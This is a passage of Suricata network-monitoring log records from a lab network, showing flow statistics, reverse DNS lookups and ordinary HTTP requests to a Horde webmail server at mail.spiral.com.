emcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:50.000294+0000","flow_id":436341541717765,"event_type":"flow","src_ip":"192.168.10.130","src_port":34228,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":66,"pkts_toclient":85,"bytes_toserver":8194,"bytes_toclient":105657,"start":"2020-02-29T00:21:44.345861+0000","end":"2020-02-29T00:21:49.809612+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:55.000161+0000","event_type":"stats","stats":{"uptime":15027,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2839,"new_pruned":17,"est_pruned":2497,"
bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":5,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:58.001576+0000","flow_id":2139845830940751,"event_type":"flow","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":2278,"bytes_toclient":6262,"start":"2020-02-29T00:21:52.170063+0000","end":"2020-02-29T00:21:57.196929+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:58.001929+0000","flow_id":1200270195341367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1676,"bytes_toclient":4695,"start":"2020-02-29T00:21:52.178231+0000","end":"2020-02-29T00:21:57.194742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:59.000384+0000","flow_id":2155793044521586,"event_type":"flow","src_ip":"192.168.10.81","src_port":52954,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:21:52.180850+0000","end":"2020-02-29T00:21:58.127221+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:00.000403+0000","flow_id":744964991983055,"event_type":"flow","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:59.499151+0000","end":"2020-02-29T00:17:59.609546+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:02.003132+0000","event_type":"stats","stats":{"uptime":15034,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2842,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":1,"flows_timeout":6,"flows_timeout_inuse":5,"flows_removed":1,"rows_checked
":65536,"rows_skipped":65527,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18522,"memcap":0}}} {"timestamp":"2020-02-29T00:23:02.069259+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37424,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45637,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:03.000165+0000","flow_id":2218856049239313,"event_type":"flow","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":4261,"bytes_toclient":25370,"start":"2020-02-29T00:21:51.877841+0000","end":"2020-02-29T00:22:01.788265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.006537+0000","flow_id":1839442932834932,"event_type":"flow","src_ip":"192.168.10.130","src_port":34234,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":26,"pkts_toclient":31,"bytes_toserver":3724,"bytes_toclient":32279,"start":"2020-02-29T00:21:44.434804+0000","end":"2020-02-29T00:21:49.758600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006701+0000","flow_id":867577733854192,"event_type":"flow","src_ip":"192.168.10.130","src_port":34256,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":117,"bytes_toserver":14695,"bytes_toclient":147060,"start":"2020-02-29T00:21:56.734192+0000","end":"2020-02-29T00:22:01.972112+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006862+0000","flow_id":2142770703138942,"event_type":"flow","src_ip":"192.168.10.130","src_port":34232,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":98,"pkts_toclient":146,"bytes_toserver":13683,"bytes_toclient":191039,"start":"2020-02-29T00:21:44.426110+0000","end":"2020-02-29T00:21:49.809005+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.006962+0000","flow_id":2145609676489439,"event_type":"flow","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":80,"pkts_toclient":124,"bytes_toserver":9977,"bytes_toclient":163566,"start":"2020-02-29T00:21:44.197343+0000","end":"2020-02-29T00:21:50.074452+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007088+0000","flow_id":1040213943538856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34230,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":23,"pkts_toclient":27,"bytes_toserver":4419,"bytes_toclient":23565,"start":"2020-02-29T00:21:44.349352+0000","end":"2020-02-29T00:21:49.759472+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007163+0000","flow_id":948151319534199,"event_type":"flow","src_ip":"192.168.10.130","src_port":34240,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":63,"bytes_toserver":5995,"bytes_toclient":76626,"start":"2020-02-29T00:21:44.727671+0000","end":"2020-02-29T00:21:49.811419+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:03.007244+0000","flow_id":823107642465495,"event_type":"flow","src_ip":"192.168.10.130","src_port":34260,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":4488,"start":"2020-02-29T00:21:56.924887+0000","end":"2020-02-29T00:22:01.968024+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007349+0000","flow_id":832002519790009,"event_type":"flow","src_ip":"192.168.10.130","src_port":34258,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":31,"pkts_toclient":40,"bytes_toserver":10242,"bytes_toclient":41891,"start":"2020-02-29T00:21:56.913849+0000","end":"2020-02-29T00:22:01.971946+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:04.004628+0000","flow_id":1572605190170049,"event_type":"flow","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:03.353729+0000","end":"2020-02-29T00:18:03.458627+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:23:07.000630+0000","flow_id":2079140748366751,"event_type":"flow","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:06.824223+0000","end":"2020-02-29T00:18:06.932681+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:08.000776+0000","flow_id":362352125925699,"event_type":"flow","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:07.317763+0000","end":"2020-02-29T00:18:07.426181+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:10.000240+0000","event_type":"stats","stats":{"uptime":15042,"capture":{"kernel_packets":139790,"kernel_drops":0},"decoder":{"pkts":139884,"bytes":96036227,"invalid":195,"ipv4":138317,"ipv6":10,"ethernet":139884,"raw":0,"null":0,"sll":0,"tcp":132773,"udp":5334,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2875,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2891,"synack":2882,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"ap
p_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2440,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2522}},"flow_mgr":{"closed_pruned":2851,"new_pruned":17,"est_pruned":2501,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17849,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:23:10.326117+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48534,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:10.599487+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093}} {"timestamp":"2020-02-29T00:23:11.007440+0000","flow_id":1461949668569849,"event_type":"flow","src_ip":"192.168.10.130","src_port":34266,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1238,"bytes_toclient":653,"start":"2020-02-29T00:22:04.111353+0000","end":"2020-02-29T00:22:09.117658+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:11.007734+0000","flow_id":1370887756629374,"event_type":"flow","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:10.771454+0000","end":"2020-02-29T00:18:10.880127+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:11.007855+0000","flow_id":545279093472280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34262,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":140,"bytes_toserver":10673,"bytes_toclient":185900,"start":"2020-02-29T00:22:03.949272+0000","end":"2020-02-29T00:22:09.400447+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:12.000169+0000","flow_id":1665067602402,"event_type":"flow","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.152034+0000","end":"2020-02-29T00:18:11.260439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:12.000581+0000","flow_id":807637155517539,"event_type":"flow","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.398435+0000","end":"2020-02-29T00:18:11.506897+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:13.290183+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.300862+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41517,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43331,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:13.520499+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:23:13.538122+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} 
{"timestamp":"2020-02-29T00:23:13.547702+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:23:13.550207+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.550601+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} 
{"timestamp":"2020-02-29T00:23:13.557270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:23:13.557697+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.559538+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.559949+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:23:13.562336+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} 